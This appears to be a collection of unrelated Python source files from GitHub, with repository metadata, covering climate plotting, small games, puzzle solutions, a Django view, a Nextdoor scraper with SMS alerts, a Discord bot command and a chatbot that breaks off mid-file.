plot_df.to_csv(f\"{DATA_PATH}/{area.attributes['NAME']}_{season}_{var}.csv\", index=False)\n\n # scatter plot\n # need to prepare data\n x = plot_df[(plot_df[\"model\"].isin(driving_models[\"CORDEX\"])) & (plot_df[\"data type\"] == \"standard\")][[\"model\", \"value\"]]\n x = pd.Series(x.value.values, index=x.model).to_dict()\n y = plot_df[(plot_df[\"project\"] == \"CORDEX\") & (plot_df[\"data type\"] == \"standard\")][[\"model\", \"value\"]]\n y = pd.Series(y.value.values, index=y.model).to_dict()\n cmip_x, cordex_y, cordex_labels = plotting.prepare_scatter_data(x, y, \"CORDEX\")\n if case_study_model_list == []:\n title = f\"{area.attributes['NAME']} {season} {var}\"\n else:\n title = f\"{area.attributes['NAME']} {season} {var}_cs\"\n\n if len(driving_models[\"CPM\"]) > 0:\n x = plot_df[(plot_df[\"model\"].isin(driving_models[\"CPM\"])) & (plot_df[\"data type\"] == \"standard\")][[\"model\", \"value\"]]\n x = pd.Series(x.value.values, index=x.model).to_dict()\n y = plot_df[(plot_df[\"project\"] == \"cordex-cpm\") & (plot_df[\"data type\"] == \"standard\")][[\"model\", \"value\"]]\n y = pd.Series(y.value.values, index=y.model).to_dict()\n cordex_x, cpm_y, cpm_labels = plotting.prepare_scatter_data(x, y, \"CPM\")\n plotting.mega_scatter(\n cmip_x, cordex_y, cordex_x, cpm_y,\n cordex_labels, cpm_labels, title,\n PLOT_PATH\n )\n else:\n plotting.simpler_scatter(\n cmip_x, cordex_y, cordex_labels,\n title,\n PLOT_PATH\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MetOffice/EUCP_WP5_Lines_of_Evidence","sub_path":"summary_boxplots.py","file_name":"summary_boxplots.py","file_ext":"py","file_size_in_byte":17233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30334809374","text":"# Kurbağa sınıfı oluşturun\r\nclass Kurbaga:\r\n def __init__(self):\r\n self.konum = [0, 0] # kurbağanın başlangıç konumu\r\n self.yemek = [7, 7] # yemeğin konumu\r\n\r\n def yemek_ye(self):\r\n if self.konum == self.yemek:\r\n print(\"Yemek yeyildi!\")\r\n else:\r\n print(\"Yemek hele tapılmayıb.\")\r\n\r\n def hareket_et(self, x, y):\r\n self.konum[0] += x\r\n self.konum[1] += y\r\n if self.konum[0] < 0:\r\n self.konum[0] = 0\r\n elif self.konum[0] > 7:\r\n self.konum[0] = 7\r\n if self.konum[1] < 0:\r\n self.konum[1] = 0\r\n elif self.konum[1] > 7:\r\n self.konum[1] = 7\r\n\r\n\r\n# Kurbağa ve tahta oluşturun\r\nqurbaga = Kurbaga()\r\ntahta = [[0 for i in range(8)] for j in range(8)]\r\n\r\n# Yemek ve kurbağanın konumunu tahtada işaretleyin\r\ntahta[qurbaga.yemek[0]][qurbaga.yemek[1]] = \"Y\"\r\ntahta[qurbaga.konum[0]][qurbaga.konum[1]] = \"K\"\r\n\r\n# Tahtayı yazdırın\r\nfor i in range(8):\r\n for j in range(8):\r\n print(tahta[i][j], end=\" \")\r\n print()\r\n\r\n# Kurbağanın yemeğe gitmesi\r\nwhile qurbaga.konum != qurbaga.yemek:\r\n x_hareketi = int(input(\"X koordinatında neçə xana ilərləmək istəyirsiniz? \"))\r\n y_hareketi = int(input(\"Y koordinatında neçə xana ilərləmək istəyirsiniz? \"))\r\n qurbaga.hareket_et(x_hareketi, y_hareketi)\r\n tahta = [[0 for i in range(8)] for j in range(8)]\r\n tahta[qurbaga.yemek[0]][qurbaga.yemek[1]] = \"Y\"\r\n tahta[qurbaga.konum[0]][qurbaga.konum[1]] = \"K\"\r\n for i in range(8):\r\n for j in range(8):\r\n print(tahta[i][j], end=\" \")\r\n print()\r\n\r\n# Yemek yendi mesajı yazdırın\r\nqurbaga.yemek_ye()\r\n","repo_name":"backlone/Qurbaga-oyunu-resul","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12934173071","text":"from django.shortcuts import render\nfrom . models import Timeline, Expertise, AboutMe\n\ndef about_me(request):\n about = AboutMe.objects.all()\n timelines = Timeline.objects.all()\n expertise =Expertise.objects.all().order_by('-created_at')\n tls = []\n for i in range(len(timelines)):\n rem = i%2\n tls.append([rem, timelines[i]])\n\n \n context = {\n 'timelines': tls,\n 'experties': expertise,\n 'about' : about\n }\n return render(request, 'about/about.html', context)","repo_name":"Rachanat535/portfolio_web_app","sub_path":"about/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31148133659","text":"#https://www.codechef.com/OCT19B/problems/MSNG/\nimport sys\nfrom collections import defaultdict\ntry: \n sys.stdin = open('input.txt', 'r') \n sys.stdout = open('output.txt', 'w')\n \nexcept: \n input = sys.stdin.readline\n \n\n\ndef anyBaseToTen(s,base):\n try:\n value=int(s,base)\n if(value>pow(10,12)):\n return -1\n return value\n\n except:\n return -1\n\ndef takeInput():\n return [x for x in input().strip().split() ]\nt=int(input())\nwhile t!=0:\n t-=1\n n=int(input())\n numbers=[]\n some_base_present=False\n for i in range(n):\n base,value=input().strip().split()\n base=int(base) \n if(base!=-1):\n some_base_present=True\n\n numbers.append([base,value])\n\n values=[set() for i in range(n)]\n for i in range(n):\n base,string=numbers[i]\n for b in range(2,37):\n if(base==-1):\n value=anyBaseToTen(string,b)\n else:\n value=anyBaseToTen(string,base)\n\n if(value!=-1):\n values[i].add(value)\n\n \n first_set=sorted(list(values[0]))\n common_element_found=False\n #Search for common elements for all values found and print smallest\n for ele in first_set:\n present=[False for i in range(n)]\n for i in range(n):\n if(ele in values[i]):\n present[i]=True\n\n false_found=False\n for bool_value in present:\n if(not bool_value):\n false_found=True\n break\n \n if(not false_found):\n print(ele)\n common_element_found=True\n break\n \n if(not common_element_found):\n print(-1)\n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"thecodearrow/100-Days-Of-Code","sub_path":"Missing Number.py","file_name":"Missing Number.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"30199389318","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport random\nimport pygame\n\nimport classes.extras as ex\nimport classes.game_driver as gd\nimport classes.level_controller as lc\n\n\nclass Board(gd.BoardGame):\n def __init__(self, mainloop, speaker, config, screen_w, screen_h):\n self.lvlc = mainloop.xml_conn.get_level_count(mainloop.m.game_dbid, mainloop.config.user_age_group)\n self.level = lc.Level(self, mainloop, self.lvlc[0], self.lvlc[1])\n gd.BoardGame.__init__(self, mainloop, speaker, config, screen_w, screen_h, 11, 6)\n\n def create_game_objects(self, level=1):\n self.board.draw_grid = False\n self.allow_unit_animations = False\n self.allow_teleport = False\n self.vis_buttons = [1, 1, 1, 1, 1, 0, 1, 1, 1]\n self.mainloop.info.hide_buttonsa(self.vis_buttons)\n\n # data = [horizontal_number_of_units, bottom_limit, top_limit, number_count, font_size]\n data = [11, 5]\n data.extend(self.mainloop.xml_conn.get_level_data(self.mainloop.m.game_dbid, self.mainloop.config.user_age_group, self.level.lvl))\n self.chapters = self.mainloop.xml_conn.get_chapters(self.mainloop.m.game_dbid,\n self.mainloop.config.user_age_group)\n\n self.data = data\n self.layout.update_layout(data[0], data[1])\n self.board.level_start(data[0], data[1], self.layout.scale)\n\n self.unit_mouse_over = None\n self.units = []\n\n self.num_list = []\n if self.mainloop.m.game_variant == 0:\n self.ob_count = data[5]\n for i in range(self.ob_count):\n index = random.randrange(data[3], data[4])\n self.num_list.append(str(index))\n elif self.mainloop.m.game_variant == 1:\n self.num_list2 = []\n\n self.ob_count = data[4]\n\n sign = [\"+\", \"-\"]\n\n for i in range(self.ob_count):\n num1 = random.randrange(1, data[3])\n rand_sign = sign[random.randrange(2)]\n if rand_sign == \"+\":\n while True:\n num2 = random.randrange(0, data[3])\n if num1 + num2 < data[5]:\n break\n else:\n num2 = random.randrange(0, num1)\n expr = str(num1) + rand_sign + str(num2)\n self.num_list.append(expr)\n\n # create table to store 'binary' solution\n self.solution_grid = [0 for x in range(data[0])]\n self.expression = [\"\" for x in range(data[0])]\n\n # find position of first door square\n xd = (data[0] - data[2]) // 2\n\n # add objects to the board\n h = random.randrange(0, 255, 5)\n\n if self.mainloop.scheme is None:\n dc_img_src = os.path.join('unit_bg', \"universal_sq_dc.png\")\n dc_tall_img_src = os.path.join('unit_bg', \"universal_r1x3_dc.png\")\n else:\n dc_img_src = None\n dc_tall_img_src = None\n\n number_color = ex.hsv_to_rgb(h, self.mainloop.cl.bg_color_s, self.mainloop.cl.bg_color_v)\n font_color = [ex.hsv_to_rgb(h, self.mainloop.cl.font_color_s, self.mainloop.cl.font_color_v), ]\n\n bg_img_src = os.path.join('unit_bg', \"universal_sq_bg.png\")\n bg_tall_img_src = os.path.join('unit_bg', \"universal_r1x3_bg.png\")\n\n if self.mainloop.scheme is None:\n door_bg_img_src = os.path.join('unit_bg', \"universal_sq_door.png\")\n else:\n door_bg_img_src = os.path.join('unit_bg', \"universal_sq_door.png\")\n if self.mainloop.scheme.dark:\n door_bg_img_src = os.path.join('unit_bg', \"universal_sq_door_no_trans.png\")\n\n for i in range(0, self.ob_count):\n x2 = xd + i * 2\n caption = self.num_list[i]\n self.board.add_universal_unit(grid_x=x2, grid_y=2, grid_w=1, grid_h=1, txt=caption,\n fg_img_src=None, bg_img_src=bg_img_src, dc_img_src=dc_img_src,\n bg_color=(0, 0, 0, 0), border_color=None, font_color=font_color,\n bg_tint_color=number_color, fg_tint_color=None,\n txt_align=(0, 0), font_type=data[6], multi_color=False, alpha=True,\n immobilized=True, fg_as_hover=False, mode=1)\n self.solution_grid[x2] = 1\n self.expression[x2] = str(self.num_list[i])\n if i < self.ob_count - 1:\n self.solution_grid[x2 + 1] = 1\n\n if h > 125:\n h = random.randrange(0, h - 25, 5)\n else:\n h = random.randrange(h + 25, 255, 5)\n\n number_color = ex.hsv_to_rgb(h, self.mainloop.cl.bg_color_s, self.mainloop.cl.bg_color_v)\n font_color = [ex.hsv_to_rgb(h, self.mainloop.cl.font_color_s, self.mainloop.cl.font_color_v), ]\n fg_number_color = ex.hsv_to_rgb(h, self.mainloop.cl.fg_hover_s, self.mainloop.cl.fg_hover_v)\n\n indu = len(self.board.units)\n inds = len(self.board.ships)\n self.door_indexes = []\n for i in range(0, self.ob_count - 1):\n self.board.add_universal_unit(grid_x=xd + i * 2 + 1, grid_y=1, grid_w=1, grid_h=3, txt=[\">\", \"=\", \"<\"],\n fg_img_src=bg_tall_img_src, bg_img_src=bg_tall_img_src,\n dc_img_src=dc_tall_img_src, bg_color=(0, 0, 0, 0), border_color=None,\n font_color=font_color, bg_tint_color=number_color,\n fg_tint_color=fg_number_color, txt_align=(0, 0), font_type=data[6],\n multi_color=False, alpha=True, immobilized=False, fg_as_hover=True, mode=0)\n\n self.units.append(self.board.ships[-1])\n self.board.add_universal_unit(grid_x=xd + i * 2 + 1, grid_y=2, grid_w=1, grid_h=1, txt=\"\",\n fg_img_src=None, bg_img_src=door_bg_img_src, dc_img_src=None,\n bg_color=(0, 0, 0, 0), border_color=None, font_color=None,\n bg_tint_color=(255, 0, 0), fg_tint_color=None,\n txt_align=(0, 0), font_type=data[6], multi_color=False, alpha=True,\n immobilized=True, fg_as_hover=False, mode=2)\n\n self.board.units[indu + i].checkable = True\n self.board.units[indu + i].init_check_images()\n self.door_indexes.append(indu + i)\n self.board.ships[inds + i].readable = False\n self.board.all_sprites_list.move_to_front(self.board.units[indu + i])\n self.changed_since_check = True\n self.outline_all(0, 1)\n\n def show_info_dialog(self):\n self.mainloop.dialog.show_dialog(3, self.d[\"Drag the slider\"])\n\n def auto_check_reset(self):\n for each in self.board.units:\n if each.is_door:\n each.update_me = True\n each.set_display_check(None)\n\n def handle(self, event):\n gd.BoardGame.handle(self, event)\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.auto_check_reset()\n if event.type == pygame.MOUSEMOTION or event.type == pygame.MOUSEBUTTONUP:\n self.default_hover(event)\n\n def update(self, game):\n game.fill((255, 255, 255))\n gd.BoardGame.update(self, game)\n\n def check_result(self):\n all_true = True\n for i in range(len(self.board.ships)):\n # calculate the active value based on grid_y of the slider\n value = self.board.ships[i].value[2 - self.board.ships[i].grid_y]\n if value == \"=\":\n value = \"==\"\n self.expression[self.board.ships[i].grid_x] = value\n mini_expression = self.expression[self.board.ships[i].grid_x - 1] + value + self.expression[self.board.ships[i].grid_x + 1]\n if eval(mini_expression) is True:\n self.board.units[self.door_indexes[i]].set_display_check(True)\n else:\n self.board.units[self.door_indexes[i]].set_display_check(False)\n all_true = False\n if all_true:\n self.level.next_board()\n self.mainloop.redraw_needed[0] = True\n\n","repo_name":"imiolek-ireneusz/eduActiv8","sub_path":"game_boards/game032.py","file_name":"game032.py","file_ext":"py","file_size_in_byte":8371,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"81"} +{"seq_id":"25815907883","text":"''' In Part 1, the bottom right of every square is the series of odd numbers squared. The length\nof the square with bottom corner n**2 is n - 1.\n\nTo get the distance from (1), we subtract from the length the remainder of the difference of the number\nfrom the bottom right corner of its square divided by the length of the square.\n\nFor example, 16 is between 9 and 25, so it belongs to the square with 25 at the bottom right corner.\nThere is a difference of 9 between 16 and 25. The remainder of this difference divided by the length\nof the side of the square tells us the position of 16 on the edge of the square it belongs to.\n\nIn this case, 17 is position 0, 16 is position 1, 15 is position 2, 14 is position 3, and 13 is position 4.\n\nWe subtract the position of the number from the length of the edge. This value is 4 for 17, 3 for 15,\n2 for 15, 1 for 14, and 0 for 13. This is only correct for the first half of the the edge\n(position < max_position / 2). We correct this calculation for the second half by subtracting this\nvalue from the length of the edge.\n\nSample square:\n# 37 36 35 34 33 32 31\n# 38 17 16 15 14 13 30\n# 39 18 5 4 3 12 29\n# 40 19 6 (1) 2 11 28\n# 41 20 7 8 9 10 27\n# 42 21 22 23 24 25 26\n# 43 44 45 46 47 48 49\n\nSample distance:\n# 6 5 4 3 4 5 6\n# 5 4 3 2 3 4 5\n# 4 3 2 1 2 3 4\n# 3 2 1 (0) 1 2 3\n# 4 3 2 1 2 3 4\n# 5 4 3 2 3 4 5\n# 6 5 4 3 4 5 6\n\n'''\n\nimport numpy as np\n\ndef find_steps(num):\n if num == 1:\n return 1\n\n _sq = round(np.sqrt(num) - 0.5)\n\n if _sq % 2 == 0:\n _min = _sq - 1\n _max = _sq + 1\n else:\n _min = _sq\n _max = _sq + 2\n\n length = _max - 1\n\n steps = length - ((_max - num) % length)\n if steps < length / 2:\n steps = length - steps\n\n return steps\n\ndef get_positions(r):\n # need to build the corners in order\n right_corner = [(r, w) for w in range(1-r, r+1)]\n top_corner = [(w, r) for w in range(r-1, -r-1, -1)]\n left_corner = [(-r, w) for w in range(r-1, -r-1, -1)]\n bottom_corner = [(w, -r) for w in range(1-r, r+1)]\n positions = right_corner + top_corner + left_corner + bottom_corner\n return positions\n\ndef iterate_square(n):\n found = False\n r, val = 1, 1\n grid = {(0, 0): 1}\n neighbors = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]\n\n while not found:\n positions = get_positions(r)\n for p in positions:\n adj_positions = [(p[0] + v[0], p[1] + v[1]) for v in neighbors]\n val = sum([grid[v] for v in adj_positions if v in grid.keys()])\n\n if val > n:\n return val\n else:\n grid[p] = val\n\n r += 1\n\nif __name__ == \"__main__\":\n sol1 = find_steps(368078) # 371\n sol2 = iterate_square(368078) # 369601\n print(f'PART 1: {sol1} \\n PART 2: {sol2}')\n\n\n\n","repo_name":"IAjimi/AdventOfCode","sub_path":"2017/AOC3.py","file_name":"AOC3.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3142330975","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time :2020-04-12 13:46\r\n# @Author :wangqinghua\r\n# @File : func.py\r\n# @Software : PyCharm\r\n\r\nfor a in range(1,10):\r\n for b in range(1,a+1):\r\n print('%s*%s=%s'%(b,a,b*a),end='\\t')\r\n print('')\r\n\r\naa=[5,15,78,6,48,32,15,9,24]\r\ndef bb(aa):\r\n count=len(aa)\r\n for a in range(0,count):\r\n for b in range(a+1,count):\r\n if aa[a]>aa[b]:\r\n aa[a],aa[b]=aa[b],aa[a]\r\n return aa\r\nprint(bb(aa))","repo_name":"awangqinghua/pythontest","sub_path":"jichuke/test/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18045896861","text":"import yaml\nfrom pprint import pprint as pp\n\ntry:\n filename = input('Enter the name of the file')\n\n with open(filename) as file:\n yaml_doc = file.read()\nexcept BaseException:\n print('file not found ending')\n raise BaseException('ENDING NOW')\nelse:\n yaml_dict = yaml.safe_load(yaml_doc)\n\n for status in yaml_dict['TABLE_peersstatus']['ROW_peersstatus']:\n pp(status)\n\n yaml_dict['TABLE_peersstatus']['ROW_peersstatus'].append({'appended_to':'peer_status_row'})\n\n pp(yaml_dict)\n\n yaml_doc = yaml.dump(yaml_dict)\n\n pp(yaml_doc)\n","repo_name":"sjn-network-automation/devasc","sub_path":"yaml_steps.py","file_name":"yaml_steps.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42453791998","text":"import os\nimport matplotlib.pyplot as plt\nimport matplotlib_venn as venn\n\nos.chdir(\"/Users/mdsutcliffe/Github/opc_analysis\")\n\nplt.rcParams[\"font.family\"] = \"Arial\"\nplt.rcParams[\"svg.fonttype\"] = \"none\"\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams['pdf.fonttype'] = 42\n\n\nfig = plt.figure(figsize=(4,3))\nv = venn.venn3(subsets = (278,98,110,57,66,0,15),set_labels = (\"DE12_factor\",\"DE12_Female\",\"DE12_Male\"))\nplt.savefig(\"./plots/DE_sex_vs_factor_12.pdf\",transparent = True)\n\nfig = plt.figure(figsize=(4,3))\nv = venn.venn3(subsets = (78,15,14,156,40,2,11),set_labels = (\"DE90_factor\",\"DE90_Female\",\"DE90_Male\"))\nplt.savefig(\"./plots/DE_sex_vs_factor_90.pdf\",transparent = True)\n\nfig = plt.figure(figsize=(6,3))\nv = venn.venn2(subsets = (1041,207,16),set_labels = (\"Female_heterogeneities_12\",\"DE12_Female\"))\nplt.savefig(\"./plots/DE_heterogeneous_12F.pdf\",transparent = True)\nfig = plt.figure(figsize=(6,3))\nv = venn.venn2(subsets = (700,131,7),set_labels = (\"Male_heterogeneities_12\",\"DE12_Male\"))\nplt.savefig(\"./plots/DE_heterogeneous_12M.pdf\",transparent = True)\n\nfig = plt.figure(figsize=(6,3))\nv = venn.venn2(subsets = (1428,36,6),set_labels = (\"Female_heterogeneities_90\",\"DE90_Female\"))\nplt.savefig(\"./plots/DE_heterogeneous_90F.pdf\",transparent = True)\nfig = plt.figure(figsize=(6,3))\nv = venn.venn2(subsets = (838,197,12),set_labels = (\"Male_heterogeneities_90\",\"DE90_Male\"))\nplt.savefig(\"./plots/DE_heterogeneous_90M.pdf\",transparent = True)\n","repo_name":"mdsutcliffe/opc_analysis","sub_path":"new/opcBulk_DESeq2_venn.py","file_name":"opcBulk_DESeq2_venn.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3262342808","text":"from sys import exit\r\nimport traceback\r\nimport logging\r\nimport getpass\r\nimport random\r\nimport time\r\nimport re\r\nimport os\r\n\r\nimport db_manager\r\nimport navigation\r\nimport scraper\r\n\r\nos.system('color')\r\n# yellow, bright yellow, reset, red, green, bold, blue\r\ny, yb, r, d, g, b, bl = '\\u001b[33m', '\\u001b[33;1m', '\\u001b[0m', '\\u001b[31m', '\\u001b[32m', '\\u001b[1m', '\\u001b[34m'\r\n\r\n# Valid carrier inputs\r\nvalid = ['Alltell', 'ATT', 'Boost', 'Cricket', 'Firstnet', 'GoogleFi', 'MetroPCS', 'Republic', 'Sprint', 'TMobile',\r\n 'USCellular', 'Verizon', 'Virgin']\r\n\r\n# Ensure email is valid\r\nemail_regex = r\"(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\\\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\\\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])\"\r\n\r\n# Possible SMS gateways\r\ndomains = ['sms.alltelwireless.com', 'txt.att.net', 'sms.myboostmobile.com', 'mms.cricketwireless.net', 'txt.att.net',\r\n 'msg.fi.google.com', 'mymetropcs.com', 'textrepublicwireless.com', 'messaging.sprintpcs.com', 'tmomail.net',\r\n 'email.uscc.net', 'vtext.com', 'vmobl.com']\r\n\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(level=logging.WARN, format=f'{d}%(asctime)s - %(name)s - %(levelname)s - %(message)s{r}',\r\n datefmt='%m/%d/%Y %H:%M:%S')\r\n\r\nemail, password, carr, num = '', '', '', 0\r\n\r\n\r\n# Make sure input read in from secrets.txt is valid\r\ndef validate_input(param, mode):\r\n if mode == 0: # Check phone number\r\n try:\r\n if len(param.strip()) != 10:\r\n raise ValueError\r\n param = int(param)\r\n except ValueError:\r\n logging.fatal('Invalid phone number in secrets.txt.')\r\n exit(1)\r\n elif mode == 1: # Check carrier\r\n if not any(carrier.lower() in param.strip().lower() for carrier in valid):\r\n logging.fatal('Invalid carrier in secrets.txt.')\r\n exit(1)\r\n elif mode == 2: # Check email\r\n if re.fullmatch(email_regex, email.strip()) is None or len(email) == 0 or len(email.split('@')[0]) > 64 or \\\r\n len(email.split('@')[1]) > 255:\r\n logging.fatal('Invalid email in secrets.txt.')\r\n exit(1)\r\n\r\n\r\nflag = input('Use secrets file? (Y/N/help) ')\r\nuse_secret = False\r\nwhile True:\r\n if flag == 'help':\r\n print(f\"\"\"{yb}Whether or not you are reading in variables from a file called \"secrets.txt\". If true, the file \r\n will need to look like this, with one element per line:\r\n {bl}phone number (in the form 9995554444)\r\n phone carrier{yb} (must be a valid carrier. if unsure, do not use a secrets file){bl}\r\n email\r\n password{r}\"\"\")\r\n flag = input('Use secrets file? (Y/N/help) ')\r\n elif flag.upper() == 'Y':\r\n use_secret = True\r\n break\r\n elif flag.upper() == 'N':\r\n use_secret = False\r\n break\r\n else:\r\n print(f'{y}Invalid input.{r}')\r\n flag = input('Use secrets file? (Y/N/help) ')\r\n\r\nvalid_lower = [x.lower() for x in valid]\r\n# User is not using a secrets file - get input from command line, make sure it is valid\r\nif not use_secret:\r\n # Phone number\r\n num = input(f'Enter phone number: {bl}(in the form 9995554444){r}: ')\r\n while True:\r\n try:\r\n if len(num) != 10:\r\n raise ValueError\r\n num = int(num)\r\n break\r\n except ValueError as e:\r\n print(f'{y}Please enter a valid number.{r}')\r\n num = input(f'Enter phone number: {bl}(in the form 9995554444){r}: ')\r\n\r\n carr = input('What phone provider do you have? Enter \"help\" to see a list of valid carriers: ')\r\n\r\n # Phone carrier\r\n while True:\r\n if not carr.lower() in valid_lower and carr != 'help':\r\n print(f'{y}Please enter a valid carrier.{r}')\r\n carr = input('What phone provider do you have? Enter \"help\" to see a list of valid carriers: ')\r\n elif carr == 'help':\r\n print(valid)\r\n print(f\"{yb}Carrier not listed? Create an issue at \"\r\n \"https://github.com/TheMinecraftOverlordYT/NextdoorScraper/issues and I'll add support for it \"\r\n f\"in a future update.{r}\")\r\n carr = input('What phone provider do you have? Enter \"help\" to see a list of valid carriers: ')\r\n else:\r\n break\r\n\r\n # Email\r\n email = input('Please enter the email you use to log into Nextdoor: ')\r\n while True:\r\n if re.fullmatch(email_regex, email) is None or len(email) == 0 or len(email.split('@')[0]) > 64 or \\\r\n len(email.split('@')[1]) > 255:\r\n print(f'{y}Please enter a valid email.{r}')\r\n email = input('Please enter the email you use to log into Nextdoor: ')\r\n else:\r\n break\r\n\r\n # Password\r\n password = getpass.getpass(prompt='Please enter your password: ')\r\n\r\n# Read in from secrets file, validate input\r\nelse:\r\n secrets_file = input('Please enter the path to your secrets file, or enter \"help\": ')\r\n while True:\r\n if secrets_file == 'help':\r\n print(f\"{yb}Please enter the path pointing to your secrets file. An example path might look something \"\r\n f\"like{bl}\\n \"\r\n r\"C:\\Users\\John\\Desktop\\NextdoorScraper\\secrets.txt.\"\r\n f\"{yb} The file should end in '.txt'.\"\r\n f\"{r}\")\r\n secrets_file = input('Please enter the path to your secrets file, or enter \"help\": ')\r\n elif not os.path.isfile(secrets_file) or not secrets_file[-4:] == '.txt':\r\n print(f'{y}Invalid path.{r}')\r\n secrets_file = input('Please enter the path to your secrets file, or enter \"help\": ')\r\n else:\r\n break\r\n\r\n try:\r\n with open(secrets_file, 'r') as secrets:\r\n num = secrets.readline()\r\n carr = secrets.readline().strip()\r\n email = secrets.readline()\r\n password = secrets.readline()\r\n validate_input(num, 0)\r\n validate_input(carr, 1)\r\n validate_input(email, 2)\r\n except IOError:\r\n logging.fatal('There was an error opening secrets.txt. Make sure the path is correct and you '\r\n 'have appropriate permissions.')\r\n traceback.print_exc()\r\n exit(1)\r\n\r\ndomain = domains[valid_lower.index(carr)]\r\ndriver_path = input('Please enter the path to your web driver: ')\r\n\r\nwhile True:\r\n if len(driver_path.strip()) == 0:\r\n break\r\n if not os.path.isfile(driver_path.strip()) or driver_path.strip()[-4:] != '.exe':\r\n print('Please enter a valid path.')\r\n driver_path = input('Please enter the path to your web driver: ')\r\n else:\r\n break\r\n\r\nsearch_terms = input('[Optional] What terms would you like to be notified of? Enter values separated by a comma: ')\r\nsearch_terms = search_terms.split(',')\r\n\r\nif len(search_terms) == 0:\r\n scraper.load_terms()\r\nelse:\r\n scraper.load_terms(search_terms)\r\n\r\ndb_path = input('Please enter the full path to where you would like your database file to be stored, or \"help\": ')\r\nwhile True:\r\n if db_path == 'help':\r\n print(f'{yb}Please enter a path pointing to where you want your database to be stored. An example might look '\r\n f'like {bl}\\n' r'C:\\Users\\John\\Desktop\\NextDoorScraper\\db.json''.\\n'f'{yb}The path should end '\r\n f'with {bl}.json{yb}. This file will keep track of notifications you have gotten so as to not '\r\n f'notify you twice for the same item.{r}')\r\n db_path = input('Please enter the path to where you would like your database file to be stored, or \"help\": ')\r\n # Strip off the file (x.json) then convert back to string and make sure directory is valid.\r\n # This checks that their desired db file would be valid without it actually having to already exist.\r\n elif not os.path.isdir(\"\\\\\".join(db_path.strip().split(\"\\\\\")[:-1])) or not db_path[-5:] == '.json':\r\n print('Please enter a valid path.')\r\n db_path = input('Please enter the path to where you would like your database file to be stored, or \"help\": ')\r\n else:\r\n break\r\n\r\ndriver = None\r\nif len(driver_path) == 0:\r\n driver = navigation.navigate(email, password)\r\nelse:\r\n try:\r\n driver = navigation.navigate(email, password, driver_path)\r\n\r\n except NameError as ex:\r\n logger.fatal('Invalid email or password.')\r\n exit(1)\r\n\r\nscraper.scroll(driver)\r\ndb_manager.init_sms(num, domain, email)\r\n\r\nwhile True:\r\n links, titles = scraper.scrape(driver)\r\n db_manager.load(links, titles, db_path)\r\n time.sleep(random.randrange(180, 300))\r\n driver.refresh()\r\n logger.debug('Page refreshed')\r\n","repo_name":"ketan-ryan/NextdoorScraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40993998935","text":"import discord\nfrom discord.ext import commands\nfrom Cogs.ArmyData import ArmyData\n\nclass Army(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.hybrid_command(name=\"군대\", with_app_command=True)\n async def army(self, ctx: commands.Context, *, member: discord.Member = None):\n \"\"\" 군대 정보를 출력합니다. \"\"\"\n member = member or ctx.author\n await ctx.send(f'{member.mention} 님은 {ArmyData.getInfo(member.id)}')\n\n\nasync def setup(bot): # Cog를 추가하는 코루틴\n await bot.add_cog(Army(bot)) # add the cog to the bot","repo_name":"StraySpeed/ThrillerBot","sub_path":"Cogs/Army.py","file_name":"Army.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33238449094","text":"# importing regex and random libraries\nimport re\nimport random\n\nclass AlienBot:\n # potential negative responses\n negative_responses = (\"no\", \"nope\", \"nah\", \"naw\", \"not a chance\", \"sorry\")\n\n # keywords for exiting the conversation\n exit_commands = (\"quit\", \"pause\", \"exit\", \"goodbye\", \"bye\", \"later\")\n\n # random starter questions\n random_questions = (\n \"Why are you here? \",\n \"Are there many humans like you? \",\n \"What do you consume for sustenance? \",\n \"Is 